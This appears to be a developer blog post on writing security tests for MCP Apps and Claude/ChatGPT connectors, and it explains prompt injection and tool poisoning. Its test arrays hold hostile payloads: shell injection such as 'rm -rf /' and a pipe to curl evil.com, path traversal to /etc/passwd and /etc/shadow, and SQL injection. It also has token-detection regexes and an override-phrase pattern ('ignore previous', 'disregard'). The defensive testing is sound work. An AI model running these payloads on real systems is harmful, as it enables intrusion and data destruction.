All posts

Security Testing for MCP Apps, ChatGPT Apps, and Claude Connectors (April 2026)

Abe Wheeler
MCP Apps MCP App Testing MCP App Framework ChatGPT Apps ChatGPT App Testing ChatGPT App Framework Claude Connectors Claude Connector Testing Claude Connector Framework Security Testing Security
Security testing MCP App tool handlers, CSP configuration, and auth flows.

Security testing MCP App tool handlers, CSP configuration, and auth flows.

AgentSeal scanned 1,808 MCP servers in January 2026 and found that 66% had at least one security finding. The most common issues were shell injection (43%), tooling infrastructure problems (20%), and auth bypass (13%). In April 2026, OX Security disclosed that the MCP STDIO transport allows arbitrary OS command execution, affecting packages with over 150 million combined downloads across LiteLLM, LangChain, LangFlow, and others.

MCP Apps have a smaller attack surface than raw MCP servers because resources run in sandboxed iframes with restrictive CSP. But your tool handlers still run server-side, accept LLM-generated inputs, and can talk to databases, APIs, and file systems. Security bugs in tool handlers ship just as easily as feature bugs, and they’re caught the same way: with automated tests.

TL;DR: Write unit tests that pass malicious inputs to your tool handlers (injection strings, path traversal, oversized payloads). Write integration tests that verify your CSP, tool annotations, and auth token handling through the mcp fixture. Run these alongside your existing test suite in CI. Input validation tests run in milliseconds. CSP and annotation checks run in seconds.

What Security Testing Covers

Security testing for MCP Apps is different from security scanning. Scanners like MCP-Scan (now Snyk Agent Scan) analyze your server configuration and tool descriptions for known patterns. They’re useful, but they can’t test your application logic. They won’t tell you that your execute_query tool handler passes user input straight to a shell command, or that your resource response includes an API key in a field the client-side component renders.

Automated security tests fill that gap. Here’s what to test:

  • Input validation: does your tool handler reject or sanitize malicious inputs?
  • CSP configuration: does your resource’s CSP only allow the origins it needs?
  • Tool annotations: do your annotations accurately describe what each tool does?
  • Auth token handling: are tokens stored server-side and never exposed in resource responses?
  • Response content: does your tool output leak internal data, stack traces, or credentials?

Each of these is testable with the same tools you use for unit tests and integration tests.

Input Validation Testing

The MCP spec is clear on this: “All tool inputs should be treated as untrusted since they come from an LLM rather than directly from the user.” Your tool handler receives arguments from the host’s LLM, and that LLM generates them based on the conversation context. A prompt injection attack can trick the LLM into sending inputs your handler wasn’t designed for.

Shell Injection

If your tool handler runs shell commands, test that metacharacters in inputs don’t break out of the intended command:

import { describe, it, expect } from 'vitest';
import { handler } from '../src/tools/run-lint/handler';

const shellPayloads = [
  'file.ts; rm -rf /',
  'file.ts && cat /etc/passwd',
  'file.ts | curl evil.com',
  '$(whoami)',
  '`whoami`',
  'file.ts\nrm -rf /',
];

describe('run-lint handler rejects shell injection', () => {
  for (const payload of shellPayloads) {
    it(`rejects: ${payload.slice(0, 40)}`, async () => {
      const result = await handler({ filePath: payload });
      expect(result.isError).toBe(true);
    });
  }
});

The fix is almost always to avoid shell commands entirely. Use Node.js APIs (fs.readFile, child_process.execFile with explicit arguments) instead of string-concatenated exec() calls. But the test catches the problem regardless of how you fix it.

Path Traversal

Tools that read or write files need to verify that inputs stay within an expected directory:

const traversalPayloads = [
  '../../../etc/passwd',
  '..\\..\\windows\\system32\\config\\sam',
  '/etc/shadow',
  'reports/../../../../etc/hosts',
  'reports/%2e%2e%2f%2e%2e%2fetc/passwd',
];

describe('export handler rejects path traversal', () => {
  for (const payload of traversalPayloads) {
    it(`rejects: ${payload.slice(0, 40)}`, async () => {
      const result = await handler({ outputPath: payload });
      expect(result.isError).toBe(true);
    });
  }
});

A solid implementation resolves the path with path.resolve() and checks that it starts with the allowed base directory. The test confirms this works for common evasion patterns, including URL-encoded sequences.

SQL Injection

If your tool queries a database, test the standard injection patterns:

const sqlPayloads = [
  "'; DROP TABLE users; --",
  "' OR '1'='1",
  "1; UPDATE users SET role='admin' WHERE id=1",
  "' UNION SELECT password FROM users --",
];

describe('search handler resists SQL injection', () => {
  for (const payload of sqlPayloads) {
    it(`handles safely: ${payload.slice(0, 40)}`, async () => {
      const result = await handler({ query: payload });
      // Should either return empty results or an error,
      // never execute the injected SQL
      if (!result.isError) {
        expect(result.structuredContent.results).toEqual([]);
      }
    });
  }
});

Parameterized queries prevent SQL injection at the implementation level. These tests verify that your parameterization actually works by checking that injection payloads don’t return unauthorized data or cause unexpected errors.

Oversized Inputs

Test that your handler doesn’t crash or consume excessive memory when given huge inputs:

it('rejects inputs over 10KB', async () => {
  const result = await handler({ query: 'a'.repeat(100_000) });
  expect(result.isError).toBe(true);
});

Your Zod schema can enforce this with z.string().max(10000), but the test catches the case where someone removes or increases the limit later.

CSP Configuration Testing

MCP App resources run in sandboxed iframes where all external connections are blocked by default. You open access by declaring specific origins in _meta.ui.csp. A misconfigured CSP can let your resource connect to origins you didn’t intend, or block connections it needs.

Write integration tests that inspect your resource’s CSP:

import { test, expect } from 'sunpeak/test';

test('weather resource CSP allows only the weather API', async ({ mcp }) => {
  const result = await mcp.callTool('get-weather', { city: 'Portland' });
  const csp = result.structuredContent._meta.ui.csp;

  // Only the weather API origin should be in connectDomains
  expect(csp.connectDomains).toEqual(['https://api.weather.gov']);

  // No external resources or frames needed
  expect(csp.resourceDomains ?? []).toEqual([]);
  expect(csp.frameDomains ?? []).toEqual([]);
});

A few things to test:

  • Each resource’s connectDomains contains only the API origins it actually calls
  • No wildcard origins (https://*) unless you genuinely need all subdomains of a specific domain
  • frameDomains is empty unless your resource embeds third-party iframes
  • resourceDomains only includes CDN origins you actually load assets from

If your app has multiple resources, test each one separately. A dashboard resource that shows charts from a charting CDN has different CSP needs than a settings resource that calls your own API.

Tool Annotation Testing

Tool annotations tell the host what your tool does: whether it only reads data (readOnlyHint), modifies something (destructiveHint), or reaches external systems (openWorldHint). Incorrect annotations are a security risk because the host uses them to decide when to ask for user confirmation. A destructive tool marked as read-only could execute without a confirmation prompt.

They’re also the #1 reason MCP Apps get rejected from the ChatGPT App Store and Claude Connectors Directory.

import { test, expect } from 'sunpeak/test';

test('tool annotations match actual behavior', async ({ mcp }) => {
  const { tools } = await mcp.listTools();

  for (const tool of tools) {
    const annotations = tool.annotations;

    // Every tool must have annotations
    expect(annotations, `${tool.name} missing annotations`).toBeDefined();

    // Tools that write, delete, or send must be marked destructive
    if (['delete-account', 'send-email', 'update-profile'].includes(tool.name)) {
      expect(annotations.destructiveHint,
        `${tool.name} should be destructiveHint: true`
      ).toBe(true);
      expect(annotations.readOnlyHint,
        `${tool.name} should not be readOnlyHint: true`
      ).not.toBe(true);
    }

    // Read-only tools must not be marked destructive
    if (['get-status', 'search', 'list-items'].includes(tool.name)) {
      expect(annotations.readOnlyHint,
        `${tool.name} should be readOnlyHint: true`
      ).toBe(true);
      expect(annotations.destructiveHint,
        `${tool.name} should not be destructiveHint: true`
      ).not.toBe(true);
    }

    // Tools that touch external systems need openWorldHint
    if (['send-email', 'post-to-slack'].includes(tool.name)) {
      expect(annotations.openWorldHint,
        `${tool.name} should be openWorldHint: true`
      ).toBe(true);
    }
  }
});

This test is more maintenance than most, since you need to update the tool lists when you add or rename tools. But it’s caught real bugs: a tool renamed from get-users to sync-users (which now writes to an external system) that kept its old readOnlyHint: true annotation.

Auth Token Testing

The recommended pattern for auth in MCP Apps is to keep tokens server-side. Your tool handler reads the token from a secure store, calls the API, and returns the result. The resource component never sees the token.

Test that this boundary holds:

import { describe, it, expect } from 'vitest';
import { handler } from '../src/tools/get-repos/handler';

describe('get-repos handler does not leak tokens', () => {
  it('structuredContent contains no auth tokens', async () => {
    const result = await handler({ username: 'test-user' });
    const content = JSON.stringify(result.structuredContent);

    // Should not contain anything that looks like a token
    expect(content).not.toMatch(/ghp_[A-Za-z0-9]{36}/);
    expect(content).not.toMatch(/Bearer\s+[A-Za-z0-9\-._~+/]+=*/);
    expect(content).not.toMatch(/sk-[A-Za-z0-9]{32,}/);
    expect(content).not.toMatch(/eyJ[A-Za-z0-9_-]+\.eyJ/); // JWT
  });

  it('rejects token passed as tool input', async () => {
    const result = await handler({
      username: 'test-user',
      token: 'ghp_stolen_token_from_prompt_injection',
    });
    // Handler should ignore unexpected fields or error
    expect(result.structuredContent).not.toHaveProperty('token');
  });
});

The MCP spec explicitly prohibits token passthrough: servers “MUST NOT accept any tokens that were not explicitly issued for the MCP server.” This test enforces that your handler ignores tokens passed in tool inputs and doesn’t echo credentials back in responses.

Response Content Testing

Tool handler responses can accidentally leak internal information. Stack traces, database connection strings, internal URLs, and debug metadata are all things that can show up in error responses and get rendered in the resource component for anyone to see.

describe('error responses do not leak internals', () => {
  it('database errors return clean messages', async () => {
    // Force a database error by passing invalid data
    const result = await handler({ id: 'nonexistent-id-999' });

    if (result.isError) {
      const content = JSON.stringify(result.content);
      expect(content).not.toMatch(/ECONNREFUSED/);
      expect(content).not.toMatch(/postgresql:\/\//);
      expect(content).not.toMatch(/at Object\.<anonymous>/); // stack trace
      expect(content).not.toMatch(/node_modules/);
    }
  });
});

Good error handling returns a user-facing message (“Could not find that item”) without exposing what went wrong internally. The MCP App error handling guide covers the implementation side. This test verifies the implementation doesn’t regress.

Tool Description Security

Tool poisoning, where malicious instructions are hidden in tool descriptions, is mainly a risk when MCP clients consume third-party servers. If you’re building the server, you control the descriptions. But it’s still worth testing that your descriptions haven’t been tampered with and don’t contain anything unexpected:

import { test, expect } from 'sunpeak/test';

test('tool descriptions are clean', async ({ mcp }) => {
  const { tools } = await mcp.listTools();

  for (const tool of tools) {
    // Descriptions should be reasonable length
    expect(tool.description.length,
      `${tool.name} description is suspiciously long`
    ).toBeLessThan(500);

    // No HTML or markdown injection
    expect(tool.description).not.toMatch(/<script/i);
    expect(tool.description).not.toMatch(/<img/i);
    expect(tool.description).not.toMatch(/\[.*\]\(javascript:/i);

    // No instruction-like patterns that could influence the LLM
    expect(tool.description.toLowerCase()).not.toMatch(
      /\b(ignore previous|disregard|forget|override|instead do)\b/
    );
  }
});

This is a lightweight check. For supply chain concerns where you consume other MCP servers, tools like MCP-Scan (Snyk Agent Scan) do deeper analysis of tool descriptions using semantic similarity and Unicode deobfuscation.

Running Security Tests in CI

Security tests should run on every pull request. They use the same test runners as your other tests, so there’s nothing extra to configure. Input validation unit tests go in tests/unit/ and run with pnpm test:unit. CSP and annotation tests use the mcp fixture and run with pnpm test:e2e.

If your project already has a GitHub Actions workflow, security tests run automatically:

# Runs both unit and e2e tests, including security tests
- run: pnpm test:unit
- run: pnpm test:e2e

For an extra layer, add a static scanner alongside your test suite:

- name: Run MCP security scan
  run: npx @anthropic-ai/mcp-scan@latest scan --format sarif > results.sarif

The combination of automated tests (which verify your specific application logic) and static scanning (which catches known vulnerability patterns) covers more ground than either approach alone.

Organizing Security Tests

Keep security tests alongside your other tests rather than in a separate directory. Input validation tests for a tool handler belong next to the handler’s other unit tests. CSP tests belong with your integration tests. This way, when someone modifies a tool, they see the security tests in the same file and update them together.

A practical layout:

tests/
  unit/
    get-repos.test.ts      # includes input validation + token leak tests
    export-data.test.ts     # includes path traversal tests
    search.test.ts          # includes SQL injection tests
  e2e/
    annotations.test.ts     # tool annotation verification
    csp.test.ts             # CSP configuration checks
    descriptions.test.ts    # tool description security

Running pnpm test:unit && pnpm test:e2e catches everything, and security tests don’t need a separate CI step or specialized runner. They work locally and in CI the same way, with no paid accounts or external dependencies.

Get Started

Documentation →
npx sunpeak new

Further Reading

Frequently Asked Questions

What security vulnerabilities are most common in MCP Apps?

The most common security issues in MCP Apps are command injection through tool handler inputs, misconfigured Content Security Policy (CSP) that allows unintended external connections, unsafe auth token handling where tokens are exposed client-side or passed through tool inputs, missing or incorrect tool annotations that give hosts wrong information about what a tool does, and path traversal in file-handling tools. AgentSeal found that 66% of 1,808 MCP servers had at least one security finding.

How do I test MCP App tool handlers for injection vulnerabilities?

Write unit tests that pass malicious inputs to your tool handler function directly. Test shell metacharacters (semicolons, pipes, backticks), path traversal sequences (../), SQL injection patterns (OR 1=1), and oversized inputs. Assert that your handler either rejects the input with a validation error or sanitizes it before use. Run these tests with pnpm test:unit.

How do I verify my MCP App CSP configuration is correct?

Write integration tests using the mcp fixture that call mcp.listResources() or mcp.callTool() and inspect the _meta.ui.csp field on the returned resource. Assert that connectDomains, resourceDomains, and frameDomains only contain origins your app actually needs. Test that no wildcard origins or overly broad patterns are present. Run with pnpm test:e2e.

How do I test auth token handling in an MCP App?

Write unit tests for your tool handler that verify tokens come from server-side storage, not from tool inputs. Assert that your structuredContent response does not include raw tokens, API keys, or session secrets in fields the resource component will render. For tools that use OAuth, test that the handler rejects requests with missing or expired tokens and returns an appropriate error.

What is tool poisoning and how do I test for it?

Tool poisoning is when malicious instructions are hidden in MCP tool descriptions, invisible to users but followed by the LLM. While this mainly affects MCP clients consuming third-party servers, you should still test that your own tool descriptions contain only factual documentation and no injected instructions. Write a test that calls mcp.listTools() and asserts each tool description is under a reasonable length and contains no HTML, markdown injection, or instruction-like patterns.

Should I run security tests in CI/CD for MCP Apps?

Yes. Security tests should run on every pull request alongside your unit and integration tests. Add them to your existing pnpm test:unit and pnpm test:e2e commands. Input validation tests run in milliseconds with Vitest. CSP and annotation verification tests run through the mcp fixture in seconds. Both work in GitHub Actions and any CI environment without paid accounts or API keys.

How do I test that my MCP App tool annotations are secure?

Use the mcp fixture to call mcp.listTools() and verify every tool has readOnlyHint, destructiveHint, and openWorldHint set correctly. A tool that writes data must not have readOnlyHint: true. A tool that deletes data must have destructiveHint: true. Incorrect annotations can cause hosts to skip confirmation prompts for dangerous operations, which is both a security risk and a submission rejection reason.

What security testing tools exist for MCP servers besides sunpeak?

MCP-Scan (now Snyk Agent Scan) is the most widely adopted MCP security scanner with over 2,000 GitHub stars. AgentSeal scans for supply chain attacks, prompt injection, and tool poisoning. Cisco mcp-scanner uses YARA-based pattern detection. AgentAuditKit is a GitHub Action for CI scanning of MCP pipelines. These tools scan server configurations and descriptions. sunpeak complements them by letting you write automated tests against your running app.